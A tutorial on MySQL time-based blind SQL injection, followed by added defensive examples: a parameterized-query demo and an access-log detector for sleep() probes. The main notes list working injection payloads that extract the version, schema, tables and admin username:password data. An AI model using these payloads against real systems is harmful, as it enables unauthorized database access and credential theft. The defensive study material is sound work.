MySQL + PHP manual injection: time-based injection
Time-based injection is a form of blind injection: it uses MySQL's sleep() function to introduce a measurable delay in the response.
sleep() is usually combined with if().
For example: select if(1=1,sleep(3),0) means: if 1=1 holds, delay for 3 s; otherwise return 0.
The time-based method first determines the length of the target data, then uses that length to query the content one character at a time.
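Why the payloads below reach the database at all, and what the fix looks like, as an added example that is not part of the original notes. Python's sqlite3 stands in for the PHP + MySQL stack (the table, rows and function names are constructed here); SQLite has no sleep(), so when the concatenated query reaches the engine the injected call fails with "no such function", which is exactly the evidence that attacker-controlled SQL was executed. With a bound parameter the SQL text never changes and the same input is merely compared as data.

```python
"""String-concatenated vs parameterized queries (added example, not from the notes).

sqlite3 is a stand-in for PHP + MySQL; it has no sleep(), so the
concatenated query surfaces the injected function call as an engine error.
"""
import sqlite3


def make_db():
    # Constructed sample table standing in for a news page's backing table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", [(1, "first"), (2, "second")])
    return conn


def fetch_unsafe(conn, user_id):
    """Mirrors the PHP pattern  $sql = "SELECT ... WHERE id=" . $_GET['id'];  (hypothetical)."""
    sql = "SELECT title FROM news WHERE id=" + user_id   # input becomes SQL text
    return [row[0] for row in conn.execute(sql)]


def fetch_safe(conn, user_id):
    """The value is bound as data; the statement text is fixed."""
    rows = conn.execute("SELECT title FROM news WHERE id=?", (user_id,))
    return [row[0] for row in rows]


def outcome(fn, conn, user_id):
    """Return ('rows', [...]) or ('error', message) so both paths can be compared."""
    try:
        return ("rows", fn(conn, user_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 and sleep(3)"):
        print("unsafe", repr(value), outcome(fetch_unsafe, db, value))
        print("safe  ", repr(value), outcome(fetch_safe, db, value))
```

The exact rows a bound non-numeric string matches depend on the engine's type coercion (MySQL is more lenient than SQLite here), so for an integer id the complete fix is to bind the parameter and also cast or validate it as an integer before the query runs.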
Testing for injection
and sleep(3): if the parameter is injectable, the page response is delayed by 3 s.
Getting the MySQL version
First determine the length of the version string, then test each character in turn.
length(): returns the length of a string
substring(): extracts part of a string
ascii(): returns the ASCII code of a character
id=1 and if(length(version())=6,sleep(3),0)
and if(ascii(substring(version(),1,1))=53,sleep(5),0)
and if(ascii(substring(version(),2,1))=46,sleep(5),0)
and if(ascii(substring(version(),3,1))=53,sleep(5),0)
and if(ascii(substring(version(),4,1))=46,sleep(5),0)
and if(ascii(substring(version(),5,1))=52,sleep(5),0)
and if(ascii(substring(version(),6,1))=54,sleep(5),0)
Getting the database name
and if(length((select schema_name from information_schema.schemata limit 0,1))=10,sleep(5),0)
and if(ascii(substring((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),0)
Getting table names
and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=34,sleep(5),0)
and if(ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=100,sleep(5),0)
Getting column names (0x61646d696e is the hex form of the string admin, written this way so the table name needs no quotes)
if(LENGTH((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e))=20,sleep(5),0)
if(ascii(SUBSTRING((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e),1,1))=105,sleep(5),0)
Getting data (0x3a is the hex form of ':', used as the separator between username and password)
if(LENGTH((select GROUP_CONCAT(username,0x3a,password)from admin))=38,sleep(5),5)
if(ascii(substring((select GROUP_CONCAT(username,0x3a,password)from admin),1,1))=105,sleep(5),5)
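From the defender's side, every step above has the same shape: a burst of requests from one client, each carrying sleep() inside an if() together with substring()/ascii()/length() against version(), database() or information_schema, and each taking several seconds longer than the page normally does. The following added example (not part of the original notes) scans constructed access-log lines for that pattern. The log format (combined log plus a trailing response-time field in seconds), the IPs, the paths and the 2 s threshold are all assumptions chosen for the demonstration.

```python
"""Detect time-based blind SQL injection probes in web access logs (added example).

Scans constructed log lines for the sleep()-inside-if() probe pattern and
groups hits by client, noting whether the response was actually slow.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines (not real traffic): combined log format with
# an assumed trailing response-time field in seconds.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=1 HTTP/1.1" 200 512 0.012
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?id=1%20and%20sleep(3) HTTP/1.1" 200 512 3.015
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /news.php?id=1%20and%20if(length(version())%3D6,sleep(3),0) HTTP/1.1" 200 512 3.021
10.0.0.9 - - [01/Jan/2024:10:00:10 +0000] "GET /news.php?id=1%20and%20if(ascii(substring(version(),1,1))%3D53,sleep(5),0) HTTP/1.1" 200 512 5.008
10.0.0.5 - - [01/Jan/2024:10:00:11 +0000] "GET /news.php?id=2 HTTP/1.1" 200 498 0.010
10.0.0.7 - - [01/Jan/2024:10:00:12 +0000] "GET /news.php?id=3%20and%20sleep(3) HTTP/1.1" 403 0 0.004
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<rt>[\d.]+)$'
)

# Indicators of the probing technique seen in the notes above.
DELAY_RE = re.compile(r'\b(sleep|benchmark)\s*\(', re.I)        # delay primitive
EXTRACT_RE = re.compile(r'\b(substring|substr|mid|ascii|ord|length)\s*\(', re.I)
META_RE = re.compile(r'information_schema|\bversion\s*\(|\bdatabase\s*\(', re.I)

SLOW_THRESHOLD = 2.0  # seconds; assumed to be well above the site's normal response time


def parse_line(line):
    """Parse one log line into a dict with the URL-decoded path, or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["decoded"] = unquote_plus(entry["path"])  # payloads arrive percent-encoded
    entry["rt"] = float(entry["rt"])
    return entry


def classify(entry):
    """Return the list of indicator names found in the decoded request."""
    query = entry["decoded"]
    hits = []
    if DELAY_RE.search(query):
        hits.append("delay")
    if EXTRACT_RE.search(query):
        hits.append("extract")
    if META_RE.search(query):
        hits.append("metadata")
    # 'slow' is only meaningful when a delay primitive is present: it tells the
    # analyst the injected sleep() actually ran rather than being blocked or ignored.
    if "delay" in hits and entry["rt"] >= SLOW_THRESHOLD:
        hits.append("slow")
    return hits


def scan(log_text):
    """Group requests carrying a delay primitive by client IP: {ip: [(path, hits), ...]}."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if "delay" in hits:
            findings[entry["ip"]].append((entry["decoded"], hits))
    return dict(findings)


if __name__ == "__main__":
    for ip, requests in scan(SAMPLE_LOG).items():
        print(f"{ip}: {len(requests)} time-based probe(s)")
        for path, hits in requests:
            print("   ", ",".join(hits), path)
```

The 'slow' marker is the useful triage signal: a client whose sleep() requests all come back several seconds late has confirmed that its input reaches the query engine, whereas 10.0.0.7 above sent the same payload but was answered in milliseconds with a 403, so only the attempt needs recording.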